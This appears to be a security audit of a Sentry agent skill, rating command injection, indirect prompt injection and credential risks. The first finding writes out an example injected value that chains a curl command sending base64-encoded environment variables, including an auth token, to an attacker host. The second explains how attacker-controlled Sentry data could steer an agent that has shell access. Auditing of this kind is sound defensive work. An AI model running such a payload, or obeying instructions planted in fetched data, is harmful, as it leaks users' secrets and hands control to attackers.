The Agent Skills Directory

COMMAND_EXECUTION (HIGH): The skill instructs the agent to execute a Python script by interpolating parameters like {your-org}, {your-project}, and --query directly into shell commands. If the agent populates these values using unsanitized user input, an attacker could provide a value such as my-project; curl http://attacker.com/$(env | base64) to execute arbitrary commands or exfiltrate environment variables (including the SENTRY_AUTH_TOKEN).
PROMPT_INJECTION (HIGH): The skill exhibits a high-risk Indirect Prompt Injection surface (Category 8). It ingests untrusted external data (Sentry issue titles, error messages, and event details) which are frequently attacker-controlled.
Ingestion points: issue-detail, issue-events, and event-detail endpoints in SKILL.md.
Boundary markers: Absent. No delimiters or instructions are provided to the agent to treat API data as untrusted content.
Capability inventory: The agent has the ability to execute shell commands via the bundled sentry_api.py script and access environment variables.
Sanitization: While the skill suggests redacting PII from output, it lacks sanitization for instructions embedded within the fetched Sentry data, which could trick the agent into performing unintended actions.
CREDENTIALS_UNSAFE (LOW): The skill correctly advises against asking for tokens in chat and suggests environment variables. However, the presence of SENTRY_AUTH_TOKEN in the environment makes it a high-value target for the command injection and exfiltration vectors noted above.

sentry